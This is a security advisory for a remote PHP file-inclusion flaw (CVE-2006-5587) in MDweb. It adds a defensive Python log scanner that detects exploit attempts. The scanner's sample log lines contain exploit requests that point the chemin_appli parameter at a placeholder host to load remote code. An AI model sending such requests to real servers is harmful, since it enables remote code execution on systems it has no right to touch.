PT-2006-6295 · Mdweb · Mdweb

Drago84 · Published 2006-10-27 · Updated 2017-10-19 · CVE-2006-5587

CVSS v2.0: 7.5 (High)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Name of the Vulnerable Software and Affected Versions: MDweb versions 1.3 and earlier
Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the chemin_appli parameter in specific PHP files, including "admin/inc/organisations/form_org.inc.php" and "admin/inc/organisations/country_insert.php".
Recommendations: For MDweb versions 1.3 and earlier, consider restricting access to the chemin_appli parameter in the affected PHP files until a patch is available. As a temporary workaround, consider disabling the execution of remote PHP code in the "admin/inc/organisations/form_org.inc.php" and "admin/inc/organisations/country_insert.php" files. Avoid using the chemin_appli parameter in the affected files until the issue is resolved.
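
While the workaround is in place, web server logs can be checked for requests that hand a URL to the affected parameter. The following is an added example, not part of the advisory or of MDweb: it assumes Apache-style common/combined access logs and the underscore spellings chemin_appli, form_org.inc.php and country_insert.php, and the sample log lines are constructed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Script paths and parameter name as given in the advisory (any install prefix).
AFFECTED = (
    "/admin/inc/organisations/form_org.inc.php",
    "/admin/inc/organisations/country_insert.php",
)
PARAM = "chemin_appli"

# Value that starts like a URL: "scheme://..." or protocol-relative "//...".
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# Client address and request target from a common/combined log line.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def remote_value(target):
    """Return the URL-like chemin_appli value of a request target, or None."""
    parts = urlsplit(target)
    if not unquote(parts.path).lower().endswith(AFFECTED):
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        value = unquote(value)  # second pass catches double encoding
        if name == PARAM and REMOTE.match(value):
            return value
    return None

def scan(lines):
    """Return (client, value) for every log line that matches."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        value = remote_value(m.group(2)) if m else None
        if value:
            hits.append((m.group(1), value))
    return hits

# Constructed sample lines (documentation addresses and host names).
SAMPLE = [
    '192.0.2.10 - - [27/Oct/2006:10:00:01 +0000] "GET /mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=http://files.example.test/x.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [27/Oct/2006:10:00:05 +0000] "GET /mdweb/admin/inc/organisations/form_org.inc.php HTTP/1.1" 200 640',
    '198.51.100.7 - - [27/Oct/2006:10:01:12 +0000] "GET /mdweb/admin/inc/organisations/country_insert.php?chemin_appli=%68ttp%3A%2F%2Ffiles.example.test%2Fx HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for client, value in scan(SAMPLE):
        print(client, value)
```

Only the query string is inspected, so a value sent in a POST body does not appear in these logs and needs request-body logging or a filtering proxy to be seen.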


Related Identifiers: CVE-2006-5587
Affected Products: Mdweb